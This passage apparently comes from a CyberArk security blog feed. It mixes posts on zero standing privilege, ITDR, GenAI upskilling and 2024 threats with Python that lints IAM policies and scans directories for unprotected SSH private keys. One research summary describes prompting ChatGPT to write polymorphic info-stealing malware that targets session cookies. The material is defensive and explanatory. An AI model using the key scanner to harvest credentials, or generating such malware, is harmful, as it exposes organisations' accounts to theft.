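    }


def _as_list(value):
    return [value] if isinstance(value, str) else list(value)


def lint_policy(policy):
    """Automated compliance check: flag wildcard actions, unscoped resources
    and allow statements with no expiry (standing privilege)."""
    findings = []
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action", [])):
            if action == "*" or action.endswith(":*"):
                findings.append(f"Statement[{i}]: wildcard action {action!r}")
        if "*" in _as_list(stmt.get("Resource", [])):
            findings.append(f"Statement[{i}]: resource '*' is not scoped")
        if "DateLessThan" not in stmt.get("Condition", {}):
            findings.append(f"Statement[{i}]: no expiry, this is standing privilege")
    return findings


def unused_services(policy, last_accessed, max_idle_days, today):
    """Compare the services a policy grants with when each was last used
    (the kind of data IAM Access Advisor exposes) and return those idle
    longer than max_idle_days: candidates for removal."""
    granted = set()
    for stmt in policy["Statement"]:
        for action in _as_list(stmt.get("Action", [])):
            granted.add("*" if action == "*" else action.split(":", 1)[0])
    idle = []
    for service in sorted(granted):
        last = last_accessed.get(service)
        if last is None or (today - last).days > max_idle_days:
            idle.append(service)
    return idle


EXAMPLE_NOW = datetime(2024, 1, 31, 12, 0, tzinfo=timezone.utc)

# Weak setting: a standing admin grant with no scope and no end time.
STANDING_ADMIN = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}

# Corrected setting: one hour of read access to one bucket prefix.
SCOPED_JIT = make_jit_policy(
    ["s3:GetObject", "s3:ListBucket"],
    ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/reports/*"],
    ttl_minutes=60, now=EXAMPLE_NOW)

# Constructed long-lived role and constructed last-accessed data for it.
LONG_LIVED_ROLE = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow",
                   "Action": ["s3:GetObject", "ec2:DescribeInstances", "iam:PassRole"],
                   "Resource": "*"}],
}
LAST_ACCESSED = {"s3": EXAMPLE_NOW - timedelta(days=2),
                 "ec2": EXAMPLE_NOW - timedelta(days=120)}
```

The expiry condition is what turns a grant into JIT access: after the timestamp passes the statement stops matching, whether or not the approver remembers to revoke it. The lint is deliberately strict about `"Resource": "*"` because a narrow action list on every resource is still standing privilege over the whole account.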

A Disciplined Approach for Taking Your Organization’s Cloud Health to the Next Level

By adhering to these guardrails, organizations can raise the health of their cloud environments to a higher level of maturity and optimize their cloud solutions for security. Like training for the EBC hike, reaching peak cloud health requires discipline.

An integrated identity security strategy, enforcing least privilege and enabling Zero Trust, is the best line of defense against attacks in today’s threat landscape. To explore our research, based on a survey of 1,500 cybersecurity professionals on how they approach securing the cloud as part of a holistic, risk-based identity security strategy for thwarting attacks and increasing cyber resilience, check out our Identity Security Model report.

Prashant Tyagi leads cloud solutions GTM (Go to Market) technology strategy at CyberArk.

GenAI’s Role in Upskilling to Close the Cybersecurity Skills Gap https://www.cyberark.com/blog/genais-role-in-upskilling-to-close-the-cybersecurity-skills-gap/ Thu, 25 Jan 2024 19:16:50 +0000 https://www.cyberark.com/?p=186670 Professional IT Technical Support Specialists and Software Programmer Working on Computers in Monitoring Control Room

The cybersecurity industry has a major people problem: it doesn’t have enough of them. The global shortage of more than 4 million cybersecurity workers isn’t a new phenomenon, but as digital and cloud initiatives accelerate, the effects are even more profound. This is especially true in the identity security domain. There aren’t enough skilled professionals to securely manage the ever-growing number of identities in the enterprise, and many teams lack specialized expertise in critical areas such as cloud security and Zero Trust architectures. This is, in part, why compromising identities remains the most effective way for cyberattackers to circumvent cyber defenses and access sensitive data and assets.

Reimagining the Classic Run-Grow-Transform (RGT) Model

Many organizations are turning to generative artificial intelligence (GenAI) and machine learning (ML) technologies to help bridge gaps, upskill existing teams, boost productivity through automation and improve their defensive strategies. When supported by robust processes and people practices, these technologies have the potential to optimize and elevate IT and security organizations at every step – from run (maintaining day-to-day business operations) to grow (scaling systems to support business evolution) to transform (implementing new systems and processes that drive new business value). Perhaps most importantly, GenAI and ML technologies can make cybersecurity an even more enticing career option by eliminating manual drudgery and emphasizing creativity, analytical thinking and other uniquely human characteristics.

Bridging Skills Gaps with GenAI and ML

GenAI and ML offer incredible promise for identity security areas such as policy optimization, risk reduction and threat detection – empowering teams to accomplish more with greater speed, increased accuracy and less manual work.

Take endpoint security policy creation, for example. Historically, experienced IT security professionals would spend hours sifting through alerts and creating policies based on these alerts. Before the policies could actually be enforced, they had to be tested manually, implemented without breaking the business and propagated to the organization. AI-powered policy creation is changing the game by delivering prescriptive policy recommendations within minutes. Teams can set these policies quickly and confidently for rapid risk reduction without manual analysis or senior-level (tier-3) analyst involvement. Of course, it’s important to test the outcome before moving to production, but an AI capability makes this a much easier task.

Security operations centers (SOCs) are harnessing ML algorithms to analyze vast amounts of identity-centric threat data in real-time and integrate it with security orchestration, automation and response (SOAR) systems to optimize response workflows. This can significantly reduce the workload on human analysts while driving down mean time to detection (MTTD) and mean time to response (MTTR) to improve overall security posture.

AI/ML can also give cybersecurity education a boost, helping to reduce the number of human-led security errors and incidents. AI-based user behavioral analytics (UBA) tools, for instance, help organizations analyze large datasets and identify patterns that could indicate risky user activities. By configuring security systems to alert on anomalies automatically, these organizations can quickly investigate potential issues and address risky habits or inadvertent slipups before they become problems.

Throughout my career, I’ve learned to take advantage of teachable moments like these, as a majority of people are very receptive to feedback and want to do the right, secure thing. With the appropriate training and support, employees outside of IT and security functions can become cybersecurity champions.

Investing in People to Elevate Security

One of the best cybersecurity investments an organization can make is in its people, empowering staff with the skills they need to navigate the evolving threat and regulatory landscapes, use emerging tools to enhance security measures and achieve their professional ambitions. Training doesn’t have to be a heavy lift. Simple actions can make a big difference, such as hosting a lunch-and-learn session for executive assistants, who are primary targets of many phishing campaigns, or sharing security guild insights.

Though the sky’s the limit with online education options in 2024, convenience and customization are key for busy cybersecurity professionals. Keep them informed of relevant upcoming training opportunities, such as online courses offered by a partner university, industry webinars or certification training. Incentivize upskilling and make learning a non-negotiable part of their work schedules. Otherwise, it may fall through the cracks.

Specialized training programs, such as the identity security courses offered through CyberArk University, can help supplement professional development curricula. By deepening their knowledge and technical abilities, team members can advance their professional goals and validate their expertise, increasing job satisfaction and retention.

The cybersecurity industry at large must continue to improve its approach to re-skilling workers and attracting new professionals to a field that needs them urgently. Recent data-backed research from ISC2 makes a compelling case for more open-minded hiring practices, diversity, equity and inclusion (DEI) and professional development reimbursement. As IT and security leaders, we must pay attention to such findings and act on them to move our industry forward – all while exemplifying optimism, cultivating trust and inspiring commitment.

Aligning with Business Processes to Effectively Manage Change

Enterprise IT environments are complex and hyper-connected – they’re not green fields. Newton’s Third Law often comes to mind in my work as a CIO, bringing me back to my university days as a physics major: for every action, there is an equal and opposite reaction. Introducing AI-powered technology (of any sort) into the mix can create a ripple effect of changes.

Each new tool must be implemented in a way that fits existing processes, systems and policies. Understanding the new tool’s impact on, and interplay with, upstream resources (e.g., databases, microservices), downstream resources (e.g., logging and security monitoring tools) and entities (e.g., business users and service accounts) is critical. And ultimately, it comes down to Zero Trust.

AI/ML tools must also be optimized for your specific environment and use cases. It’s important to lean on vendor partners who can help fine-tune algorithms, adjust alert thresholds and streamline integrations with existing security infrastructure to meet organizational requirements. Once you’re up and running, establish feedback loops with your internal security teams and make continuous process improvements based on their hands-on experiences.

For the Love of the Game

GenAI and ML cannot replace cybersecurity’s critical human element. Still, with a focus on enablement and close business process alignment, these technologies can help bridge skills gaps, strengthen identity security programs and even reignite a passion for cybersecurity work. After all, the love of the game is why 73% of cybersecurity professionals say they joined this business to begin with.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Grossman on CyberArk’s Security Matters | CIO Connections page.

Why Identity Security Requires More Than ITDR https://www.cyberark.com/blog/why-identity-security-requires-more-than-itdr/ Wed, 24 Jan 2024 06:44:09 +0000 https://www.cyberark.com/?p=186771 Guardian dog surrounded by sheep

Identity Threat Detection and Response (ITDR) is one of many aspects of an effective identity security program. Yet despite what some detection and response-focused vendors may argue, ITDR is not a silver-bullet solution to prevent identity-centric attacks. Such a thing doesn’t exist.

In fact, modern data breaches, industry analyst perspectives and compliance requirements make it crystal clear that organizations need more than ITDR to build an identity security program.

Today’s Attack Methods Circumvent ITDR Solutions

Major recent breaches highlight the value of proactive identity risk reduction, because new identity-centric attack methods that bypass ITDR and other reactive controls keep emerging. Many ITDR systems depend on endpoint agents to collect their telemetry; where no agent is present, they cannot detect or respond to activity at all.

Take, for example, the September 2023 MGM breach. The Scattered Spider group behind the attack relied on stolen credentials but did not follow the traditional route of deploying malware on employee endpoints. Instead, the attackers voice phished (or ‘vished’) employees and help desk teams, talking them into handing over credentials and resetting multi-factor authentication (MFA) settings.

Even with ITDR agents deployed on all endpoints, Scattered Spider could have still gained access. The attack specifically circumvented the endpoint, relying on social engineering in a medium (phone calls) where detection-focused security tools would not have visibility or context.

The same was the case with the October 2023 Okta breach, where attackers first compromised an Okta employee’s personal device and personal account, knowing these were likely outside the estate covered by ITDR and other detection-focused technology. There they found and used the credentials of a corporate privileged service account, saved in the password manager of the employee’s personal account.

This breach also illustrates the need for ITDR as part of the identity fabric. With a mature, integrated program spanning PAM and ITDR, the organization could not only have prevented the employee from ever seeing (and saving) the service account credentials but also detected anomalous or unauthorized use of those credentials and terminated the session.

To defend against modern attack methods, organizations need both proactive and reactive controls.

ITDR, Identity Security and Zero Trust

Consider the core mantra of the Zero Trust philosophy: “Never Trust, Always Verify.” Organizations that rely on ITDR alone set themselves up to fail on both counts. ITDR can neither proactively reduce the attack surface (never trust) nor authenticate user connections (always verify).

Agent-based ITDR solutions also often cannot see behavior beyond an identity’s endpoint, such as a web browser session to a SaaS app or a CLI session to an elastic cloud workload. ITDR systems therefore depend on integrations with other controls to detect or respond to attacks outside the endpoint.

However – ITDR can help progress Zero Trust initiatives as part of a broader identity fabric. Through integration with privileged access management (PAM) and identity governance and administration (IGA) disciplines, ITDR adds a layer of defense-in-depth control to help organizations adopt the ‘assume breach’ mindset. ITDR also adds value to access management systems, authenticating end users in alignment with Zero Trust principles, helping organizations detect anomalous or risky activity – and denying access. ITDR capabilities from PAM solutions can also help detect privilege misuse, credential theft, and attempts to bypass PAM controls and workflows – without any agents.

In effect, ITDR can add value to Zero Trust initiatives through tight integration with existing identity security investments.

Analyst Perspectives: ITDR and the Identity Fabric

Industry analysts have long agreed on the need to secure identities with both proactive and reactive controls. In particular, many analysts cite the imperative for an interconnected identity fabric architecture that blends modular technologies to consistently enforce risk-aware, adaptive and resilient access controls – for both human and machine identities.

Operational efficiency is an essential element of the identity fabric concept. Analysts emphasize security teams should reduce complexity by focusing on IAM disciplines, not tools, and aiming to improve the composability of those disciplines. Mature ITDR disciplines can help realize this concept via data exchange with other disciplines like access management, PAM and IGA.

Of note, leading analysts emphasize identity fabrics are not synonymous with any single vendor’s suite of products; instead, the concept describes a proposed architecture of people, processes and technologies from different vendors that collectively provide defense-in-depth protection for all human and machine identities.

Compliance and Cyber Insurance Perspectives

Auditors and cyber insurers also offer clear recommendations to proactively reduce the identity attack surface. For example, compliance with frameworks like PCI DSS and AICPA SOC 2 requires adherence to proactive requirements like restricting access to sensitive systems and authenticating all connections.

The NIST Cybersecurity Framework is particularly clear in its guidance, specifying five core elements: Identify, protect, detect, respond and recover. Access control is the very first category of controls in NIST’s ‘protect’ phase, and NIST views proactive access control as foundational. The framework provides clear guidance to ensure:

  • PR.AC-1: “Identities and credentials are managed for authorized devices and users”
  • PR.AC-3: “Remote access is managed”
  • PR.AC-4: “Access permissions are managed, incorporating the principles of least privilege and separation of duties”

Cyber insurance underwriters, who have direct ‘skin in the game’ when keeping clients secure, also recognize that phishing, ransomware and software supply chain attacks all rely on compromised identities and credentials. Not surprisingly, underwriters look for proof an organization is both proactively and reactively reducing the risk of identity compromise.

Examples of common cyber insurance requirements include:

  • Taking endpoint security past endpoint detection and response (EDR/XDR) by proactively removing local admin credentials from employee workstations and servers.
  • Enforcing MFA to verify use of administrative privileges.
  • Securely managing and rotating credentials for highly privileged accounts and machine identities like service accounts.
  • Isolating usage of privileged accounts to prevent lateral movement.
  • Extending privileged access management controls to third-party vendors.

Beware of Wolves in Sheep’s Clothing: ITDR Vendor Claims to Watch Out For

Some ITDR vendors continue to market their capabilities as superior to PAM, access management and IGA, despite the consensus recommendation for both proactive and reactive identity security controls.

In particular, certain ITDR-focused vendors have communicated that PAM solutions are insufficient, even releasing misleading claims like the ones illustrated in the “ITDR Vendor Claim” column of the chart below (yes, they are actual vendor claims, which we’ve reworded so as not to call out the vendor directly). For clarity, we’ve included an analysis of where each discipline adds value to an identity security program in the right column (“Identity Security Reality”).

Chart illustrating ITDR vendor claims versus identity security reality across categories.

CyberArk believes security is a team game, which is why we aren’t singling out the vendor behind the claims in the table’s left column. But you should evaluate baseless claims that any one vendor can ‘do it all’ with caution. Understand that to truly reduce risk, your identity security program needs both proactive and reactive controls.

TL;DR: You Need More Than ITDR to Secure Your Organization’s Identities

ITDR does not replace widely recommended security disciplines like access management, PAM and IGA. Rather, ITDR can add value and help make Zero Trust a reality through tight integration with these disciplines in an identity fabric model.

Want to learn more about the connection between identity security and Zero Trust? Check out our whitepaper on Guiding Your Leadership Team Through the Zero Trust Mindset.

Sam Flaster is a director of product marketing at CyberArk.

3 Things About 2023’s Threat Landscape That Shapes My 2024 CIO POV https://www.cyberark.com/blog/3-things-about-2023s-threat-landscape-that-shapes-my-2024-cio-pov/ Wed, 17 Jan 2024 16:26:08 +0000 https://www.cyberark.com/?p=186689

2023 was a tumultuous year that drove technology transformation at an unprecedented pace. The industry saw accelerated, unrivaled technology adoption, persistent yet evolving challenges and unparalleled market dynamics around the world.

The following are the top three trends from last year that influenced my thinking as a CIO at the top of 2024:

1. Software Supply Chain: The Root Cause of 2023’s Notable Breaches

2023 saw the industry’s first double supply chain attack that spotlighted third- and, particularly, fourth-party suppliers as a potent threat vector.

Take, for example, the massive compromise of 3CX, a VoIP and teleconferencing provider, whose desktop application was trojanized and used to unfold multi-staged attacks against users in early 2023. According to Mandiant, this was likely the first double supply chain attack the industry had seen, impacting a large portion of 3CX’s more than 600,000 customers. In mid-2023, mass exploitation of a vulnerability in the MOVEit Transfer file transfer software, leading to data theft and extortion by a ransomware group, was yet another instance of a software supply chain attack. Several impacted organizations were suppliers or vendors to other organizations, causing downstream impact to organizations large and small, as well as to U.S. and French government agencies.

2. GenAI’s Hype Cycle and Adoption

Less than a year after its launch, ChatGPT hit 100 million weekly users, and over 2 million developers are currently building on the company’s API, including the majority of Fortune 500 companies. As a technologist, I find this exciting and troubling at the same time.

It’s an exciting time to harness the potential of AI to advance, yet navigating AI’s Wild West is challenging. With no playbook or precedent to follow, technologists and cybersecurity professionals must skillfully navigate the potential and real-world secure applications of GenAI. While GenAI is expected to boost productivity and innovation, fearmongers warned early on that bad actors would use it for nefarious purposes. Underscoring this concern, in January 2023, CyberArk Labs published a blog based on their research, proving that ChatGPT could produce sophisticated polymorphic malware with the right prompts.

To tackle these issues head-on, in 2023 the U.S. issued an executive order on AI and the EU reached political agreement on its AI Act, both intended to enforce best practices and regulatory frameworks.

3. Global Political and Economic Uncertainty

Last year was also marred by geopolitical conflict in different parts of the world, resulting in several attempted attacks on critical infrastructure and supplier ecosystems. According to the World Economic Forum, in 2024, 90% and 79% of its chief economists expect geopolitics and domestic politics to be sources of volatility in the global economy, respectively. With several armed conflicts likely to continue well into the new year and three of the world’s five largest economies (U.S., India, and U.K.) heading for national elections, there is no doubt in my mind that attacks on critical infrastructure and, in turn, on technology vendors will amplify around the globe.

I expect complexities to rise as the lines between nation-state actors and cybercriminals blur and there is a steady shift in the intent of attacks from espionage to sabotage.

My Outlook for 2024

2024 will be a cat-and-mouse game between cybersecurity teams and bad actors in a politically charged world. I expect relentless social engineering attacks, attempts to cripple critical infrastructure, exploitation of the supply chain and every other possible vulnerability to rise multi-fold.

In 2024, to protect your organization, you’ll need to:

  • Periodically evaluate your vendors’ security capabilities. Your vendors’ ability to secure their products and services will ensure your organization can stay secure and confidently conduct business. Given the heavy reliance on third-party SaaS solutions, 98% of organizations have a relationship with a vendor that experienced a data breach within the last two years. Your organization may be one of them; therefore, it’s important to leave no stone unturned to boost your defenses. Also, pay special attention to end-of-life products that are still in use and secure them.
  • Remember that the definition of AI systems is not limited to GenAI. AI systems include GenAI along with systems using neural networks and tools built over several years. In 2024, it is essential to evaluate, secure and manage all systems – both old and new. You should consider contractual agreements that periodically allow you to review your suppliers’ risk-based governance and risk management policy for all products and systems using AI in any capacity. This practice should include provisions for any information-sharing on relevant audit trails, reviews, bias and fairness in decision-making, data retention, etc.
  • Go back to the basics and do them right. Focus on improving employee training, organizational security hygiene, round-the-clock threat detection and response, upskilling cybersecurity skills and adopting automation and artificial intelligence.
  • Implement a robust Zero Trust strategy. If you have not started your journey to Zero Trust, wait no more. Start Now. On the other hand, if you have already implemented a Zero Trust strategy, evaluate and iterate your strategy against the backdrop of any changing environments. Remember, comprehensive security means implementing a Zero Trust strategy throughout the entire identity lifecycle.
  • Treat your people as the greatest asset, not the weakest link. We can have all the tools in the world to protect our organization, but the most valuable assets are the people – cybersecurity experts, employees, contractors, and partners, among many others. Be sure to treasure, train and nurture them. At the end of the day, it’s all about the people.

Finally, as a CIO and a technology leader, I recommend that you take a step back and find your balance and scale, but do not rush as you grapple with these new issues.

In 2024, I plan to share my thoughts and recommendations with you on a regular basis. In the upcoming blogs, I will discuss several important issues, including the right balance between upskilling cybersecurity talent and adopting AI tools, best practices to maintain privacy and managing cloud complexities. I hope you’ll find it helpful in your journey to protect your organization.

Happy 2024 to all of you.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Grossman on CyberArk’s Security Matters | CIO Connections page.

Securing High-Risk Access with Reimagined PAM Controls: A Customer Story https://www.cyberark.com/blog/securing-high-risk-access-with-reimagined-pam-controls-a-customer-story/ Tue, 09 Jan 2024 16:32:55 +0000 https://www.cyberark.com/?p=186113

My team and I were on a call with a customer who saw a critical need to secure access to his company’s cloud service provider (CSP) containers. Our conversation comes to mind often, because it reflects the fast-evolving nature of privileged access and what it takes to secure it in today’s complex IT environment.

As we spoke, the customer stood out to me as a forward-thinking leader. His job: protect and enable an enterprise that is no stranger to the cloud. While more than eight in 10 IT leaders are adopting a hybrid cloud environment, this customer’s company was born there. Our job: help him finalize an integrated set of solutions and controls to protect his CSPs.

Our discussion about applying zero standing privileges, or ZSP, to cloud power users was capturing everyone’s imagination and attention, even my own (and I talk about these things quite a bit). Why? Consider what’s at stake: the risk of standing access to highly privileged administrative roles is too high. Attackers who compromise cloud users’ identities can disrupt operations, steal data and more.

With ZSP, users are elevated just-in-time (JIT), with only the entitlements necessary for the task at hand. In turn, ZSP enables security teams to secure their cloud environments by:

  • Reducing the risk of credential theft by preventing standing access.
  • Enforcing real-time least privilege in the cloud by granting only the relevant permissions a user needs – and only when needed – for a given task.
  • In turn, lessening the potential impact of an account takeover; an attacker’s options are extremely limited without admin-level access.

PAM’s Essential, Foundational Role Goes Next-Gen

As we dug deeper into how we could help our customer with contemporary use cases – like securing access for cloud engineers and non-human identities – we still needed to talk about the essential role of foundational privileged access management (PAM) controls. Because whether you’re a 100-year-old corporation migrating to the cloud, or a 1-year-old startup native to the cloud, you face a set of constants:

  • Your organization has privileged users, accounts and credentials.
  • Attackers will try to compromise these users’ identities, move laterally and elevate privileges.
  • These users, including IT admins of all types, require fierce protection.

Considering those constants, we wouldn’t be doing our jobs if we didn’t ask the question: “Have you thought about the need for fundamental PAM controls like securely storing and rotating the credentials of highly privileged users?”

The response: Crickets. At first.

Some key “ah-ha moments” arose as we continued exploring our customer’s challenges. For example, securing privileged credentials actually transcends both PAM’s well-established and next-gen eras. It’s a key example of a PAM mainstay that can and should be reimagined, to secure a broad range of high-risk users.

Think about the textbook-definition privileged IT users that companies’ PAM programs have focused on for years – like Linux admins who use SSH keys to access their organizations’ systems. The risk we’ve all seen, time and time again: these admins often store their credentials locally on workstations, where attackers can easily find them.

But you know who else does this? Cloud developers.

Redefining PAM for Today’s and Tomorrow’s Threats

Similar to traditional IT admins, it’s common for cloud developers to download an SSH key from a console, save it on their workstations and use it to log into an Amazon EC2 instance in their organization’s cloud environments. Why? The need for speed leads to risky actions. Regardless of their job descriptions, power users in the cloud are bound by urgency. This is true for:

  • Architects under deadline pressure to complete lift-and-shift migrations.
  • Developers collaborating in the cloud to continuously build and maintain apps.
  • On-call engineers ready to fix any cloud outages that would impact application users.
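The risk described above, SSH private keys sitting on a workstation where anyone who lands on the endpoint can copy them, is easy to check for. What follows is an added example written for this edit; it is not CyberArk code and not part of any product. It walks a directory the way an endpoint audit would, recognizes private key files by their headers and reports which ones carry no passphrase: a legacy PEM key without a `Proc-Type: 4,ENCRYPTED` header, a PKCS#8 `BEGIN PRIVATE KEY` block, or an OpenSSH-format key whose cipher field decodes to `none`. The files it scans are synthetic, built in a temporary directory with only the header fields the checks read; they are not real keys.

```python
import base64
import struct
import tempfile
from pathlib import Path

# Header lines that identify the common on-disk private key encodings.
PEM_TRADITIONAL = {"-----BEGIN RSA PRIVATE KEY-----", "-----BEGIN EC PRIVATE KEY-----",
                   "-----BEGIN DSA PRIVATE KEY-----"}
PKCS8_PLAIN = "-----BEGIN PRIVATE KEY-----"
PKCS8_ENCRYPTED = "-----BEGIN ENCRYPTED PRIVATE KEY-----"
OPENSSH = "-----BEGIN OPENSSH PRIVATE KEY-----"
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _openssh_cipher(text: str) -> str:
    """Read the cipher name from an OpenSSH-format key. The base64 body decodes to
    magic, string ciphername, string kdfname, ...; an unencrypted key says "none"."""
    body = "".join(l for l in text.splitlines() if l and not l.startswith("-----"))
    blob = base64.b64decode(body)
    if not blob.startswith(OPENSSH_MAGIC):
        raise ValueError("not an openssh-key-v1 blob")
    off = len(OPENSSH_MAGIC)
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n].decode("ascii")


def classify_key(text: str):
    """Return (format, passphrase_protected) for a private key, or None if the
    content is not a private key at all."""
    first = text.lstrip().splitlines()[0] if text.strip() else ""
    if first in PEM_TRADITIONAL:
        # Legacy PEM keys mark passphrase protection with a Proc-Type header.
        return "pem", "Proc-Type: 4,ENCRYPTED" in text
    if first == PKCS8_ENCRYPTED:
        return "pkcs8", True
    if first == PKCS8_PLAIN:
        return "pkcs8", False
    if first == OPENSSH:
        return "openssh", _openssh_cipher(text) != "none"
    return None


def scan_for_keys(root) -> list:
    """Walk a directory tree and report every private key found. A finding with
    encrypted=False is usable as-is by anyone who copies the file."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.stat().st_size > 64 * 1024:
            continue  # keys are small; skip big files and anything not a regular file
        try:
            text = path.read_text(encoding="ascii")
        except (UnicodeDecodeError, OSError):
            continue  # binary or unreadable: not a PEM/OpenSSH key
        result = classify_key(text)
        if result is not None:
            findings.append({"name": path.name, "format": result[0], "encrypted": result[1]})
    return findings


def make_sample_openssh_key(cipher: str) -> str:
    """Build a synthetic OpenSSH-format key file holding only the header fields
    the scanner reads. Constructed for this example; it is not a usable key."""
    kdf = b"none" if cipher == "none" else b"bcrypt"
    blob = (OPENSSH_MAGIC + _ssh_string(cipher.encode()) + _ssh_string(kdf)
            + _ssh_string(b"") + struct.pack(">I", 1))
    return f"{OPENSSH}\n{base64.b64encode(blob).decode()}\n-----END OPENSSH PRIVATE KEY-----\n"


def demo() -> list:
    """Populate a temporary 'workstation' with constructed sample files and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        ssh = Path(tmp) / ".ssh"
        ssh.mkdir()
        (ssh / "id_ed25519").write_text(make_sample_openssh_key("none"))
        (ssh / "id_ed25519_protected").write_text(make_sample_openssh_key("aes256-ctr"))
        (ssh / "legacy.pem").write_text(
            "-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
            "DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\nQUJD\n"
            "-----END RSA PRIVATE KEY-----\n")
        (Path(tmp) / "deploy_key.pem").write_text(
            "-----BEGIN PRIVATE KEY-----\nQUJD\n-----END PRIVATE KEY-----\n")
        (Path(tmp) / "notes.txt").write_text("nothing to see here\n")
        return scan_for_keys(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['name']:<24}{f['format']:<9}{'passphrase' if f['encrypted'] else 'UNPROTECTED'}")
```

Point `scan_for_keys` at a developer’s home directory to enumerate what an attacker on that endpoint would find. A passphrase only raises the bar; the fix the post is arguing for is to move the key into a vault and broker SSH sessions through it so the credential never lands on the workstation at all.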

Enterprises know that every new service rolled out by CSPs comes with a host of new roles and entitlements – with which their existing identity and access management controls are often incompatible. To avoid the problem, they simply give cloud users far more entitlements than they’d ever need – in the name of speed and convenience.

The result: identities are over-permissioned beyond what their roles require and often have powerful standing access. Threat actors know all of this – to the point that the National Security Agency (NSA) suggests misconfigurations are the most common and easiest entry point into cloud environments for attackers.

And like many security leaders, our customer knew it too.

By the time the conversation wrapped up, he was keen to incorporate a balance of reimagined PAM controls like ZSP and time-tested PAM fundamentals into his plan – to the point where he asked: “Why wouldn’t we apply these controls to securing our users’ credentials?” His question applied not only to his cloud users, but to the traditional IT admin roles found within any enterprise of any size, industry or cloud maturity. Because he knew that securing identities in a fast-changing field like PAM means keeping an eye toward the future, while never forgetting the fundamentals.

What One Security Leader’s Story Can Teach Us About PAM’s Evolution

Today’s PAM programs face an increasingly vast and dynamic threat landscape, upended by innovation and reshaped by new identities, environments and attack methods.

Technology shifts have allowed organizations to delegate powerful access to anyone or anything. Any human identity can gain high-risk access, from admins and vendors to cloud engineers and developers. Even the day-to-day business user can now perform admin-level tasks in their domain. The same goes for non-human identities, including automation accounts found in manufacturers’ operational technologies. Moreover, privilege moves with IT. While IT will always exist on-premises, privilege is increasingly in the cloud.


In times like these, PAM is more important than ever – and should be as consistent and dynamic as privilege itself. Organizations will always need foundational PAM. At the same time, IT security teams need to reimagine their PAM programs. Nearly all (99%) security decision-makers say they’ll face an identity-related compromise in the year ahead – with the number-one reason being transformational initiatives like cloud migrations.

Securing Privileged Access in Transformative Times

In a new perspectives piece, I explore two use cases requiring a mix of time-tested principles and innovative new controls.

  • The first area is privileged access in cloud environments – we only scratched the surface here regarding the risks and how to secure access for not only human but also non-human identities. Only 25% of security leaders say they secure sensitive access to bots and robotic process automation (RPA) that are integral to cloud-based development – we’ll talk more about how to solve problems like these.
  • The second area is operational technology (OT). About 70% of business leaders who’ve invested in securing OT (which includes devices, machinery and systems used in sectors such as manufacturing, energy and healthcare) face implementation challenges. And the stakes are high, especially in critical infrastructure sectors where an OT attack can jeopardize critical services that society relies on. We’ll share best practices on that, as well.

For further insights on today’s fast-changing threat landscape and what it takes to protect your organization, check out Barak Feldman’s viewpoints piece, “Securing Privileged Access in Transformative Times.”

Barak Feldman is senior vice president of privileged access management (PAM) and identity security at CyberArk.

CyberArk Labs’ 2023 Threat Research Highlights https://www.cyberark.com/blog/cyberark-labs-2023-threat-research-highlights/ Tue, 02 Jan 2024 15:00:09 +0000 https://www.cyberark.com/?p=185937

Throughout an eventful 2023, CyberArk Labs remained focused on uncovering emerging cyberattack patterns and producing threat research aimed at helping organizations strengthen their identity security defenses.

We covered a lot of ground this year and had the opportunity to share our findings at events around the world. Today, we’re revisiting some notable threat research projects from 2023:

Chatting Our Way Into Creating a Polymorphic Malware

AI-enabled threats were top-of-mind for security professionals this year – with good reason. CyberArk Labs began experimenting with ChatGPT in its earliest public days to see how attackers might try to use it, starting with polymorphic malware generation. We asked ChatGPT to create an info-stealer, which it delivered after making some major security snafus along the way, such as hardcoding credentials. Ultimately, we found that attackers can use AI-generated polymorphic malware to evade defenses. For example, an attacker could use ChatGPT to generate (and continuously mutate) information-stealing code for injection. By infecting an endpoint device and targeting identities – locally stored session cookies, in our research – they could impersonate the device user, bypass security defenses and access target systems without detection. We expect that automated identity-based attacks like these will become even more prevalent as AI models improve.

Read the full research.

The (Not so) Secret War on Discord

Cybercrime groups are increasingly using legitimate resources – from publicly available repositories to enterprise software applications – for their own nefarious purposes. This spring, CyberArk Labs discovered a new malware strain distributed over Discord, a popular chat service loved by developers and used by hundreds of millions of people around the world. Dubbed Vare, the malware uses Discord for dual purposes: for targeting new malware operators via social engineering and as an infrastructure for data exfiltration. Our team’s research exposed the group behind the malware, their attack methods and their potential motivations. Most important, we emphasized caution, as any corporate developer using Discord could potentially put their organization at risk if their endpoint is infected with the Vare malware.

Read the full research.

White Phoenix: Beating Intermittent Encryption

Ransomware actors can significantly speed up their attacks by encrypting just enough data to make files useless (but not all of it). Our team set out to combat this “intermittent encryption” method used by BlackCat and other large ransomware groups. The result was White Phoenix: an open-source ransomware recovery tool that allows victim organizations to recover files encrypted by ransomware strains that use intermittent encryption. White Phoenix supports PDFs, Microsoft Office documents and zip files. But other formats, such as video and audio files, may also be recoverable. We welcome continued community contributions to enhance the tool and improve ransomware protection for all.

Read the full research and explore the free tool.

Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation

